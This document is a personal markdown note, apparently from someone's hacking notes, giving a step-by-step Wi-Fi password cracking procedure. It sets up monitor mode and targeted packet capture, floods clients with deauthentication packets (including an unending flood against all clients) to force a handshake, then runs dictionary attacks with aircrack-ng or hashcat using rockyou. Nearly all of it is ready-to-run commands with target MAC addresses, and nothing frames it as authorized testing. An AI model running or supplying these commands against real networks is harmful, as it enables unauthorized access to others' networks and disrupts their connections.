hacking_wifi_aircrack

"/home/yossef/notes/personal/hacking/hacking_wifi_aircrack.md"

path: personal/hacking/hacking_wifi_aircrack.md

- **fileName**: hacking_wifi_aircrack
- **Created on**: 2025-07-19 12:29:23

hacking the wifi using aircrack and airmon and airodump by capture the handshake

now you need to capture the handshake from the network(handshake is a file
the network send to the user to check if the user password is correct when
i try to connect to the network)after that gone try to guess the password
using aircrack-ng with rockyou wordlist

enter on monitor mode

sudo airmon-ng start <interface>(wlan0)

check the network and getting information about it

sudo airodump-ng wlan0mon

now check the packets that send to the target network only

sudo airodump-ng --bssid <network bssid>(CC:29:BD:02:36:AC)  -c <channel>(7)\
    -w <output file name>(test1) <interface>(wlan0mon)

now gone send a packets to the network clients to DE authentication the
client connection to network and make them to retry to connect to the network

sudo aireplay-ng -0 500 -a  CC:29:BD:02:36:AC  -c F6:43:72:51:4F:ED    wlan0mon

Important

-0 500 : number os DE authentication packet gone send
-a: is the network bssid
-c: the client that connect to the network
wlan0mon: name of interface

there is better way for doing this check this

sudo aireplay-ng --deauth 0 -a <target_network>D4:6B:A6:82:09:7C <interface> wlan0mon

Important

--deauth 0 : mean that the target is all connect client on network
and it's not stop must you stop when capture the handshake from the network

now hacking the password using aircrack-ng

sudo aircrack-ng -a 2 -b   D4:6B:A6:82:09:7C  -w \ 
~/personal/hacking/genrate_numbers_password/passwords.txt ./test1-02.cap

Explanation

Important

sudo : Runs the command with root privileges (required for network actions).
aircrack-ng : The tool used to crack WEP/WPA/WPA2 Wi-Fi passwords using captured packets.
-a 2 : Tells aircrack-ng to target WPA/WPA2 networks. 2 = WPA/WPA2, 1 = WEP.
-b D4:6B:A6:82:09:7C : BSSID (MAC address) of the target access point.
-w ~/.../passwords.txt : Path to the wordlist file containing potential passwords.
./test1-02.cap : The capture file containing the WPA/WPA2 handshake.

What It Does

This command attempts to crack the WPA/WPA2 password of the access point with
BSSID D4:6B:A6:82:09:7C using a dictionary attack from the provided
wordlist, analyzing the handshake in test1-02.cap.

Tip

Make sure the .cap file includes a full handshake, or the attack will fail.

Tip

must having a wordlist for hacking check this
rockyou.txt: search for it
github password list

Tip

when using aircrack for wifi hacking i for better performance to use
hashcat insted so first i must capture the handshake using airodump and
aireplay and then i want to convert .cap file to hashcat file using
hcxpcapngtool and then crack using hashcat(for better speed performance)
for install the tools and using the commmend

sudo pacman -S aircrack-ng  hcxtools hashcat # install packages

#convert to new file hash format
hcxpcapngtool -o <output file>hash.hc22000 <cap file>capture-01.ca 

# start cracking using the rockyou password for example
hashcat -m 22000 -a 0 hash.hc22000 ~/rockyou.txt

continue:./jwt_hack.md
before:./sql_injection.md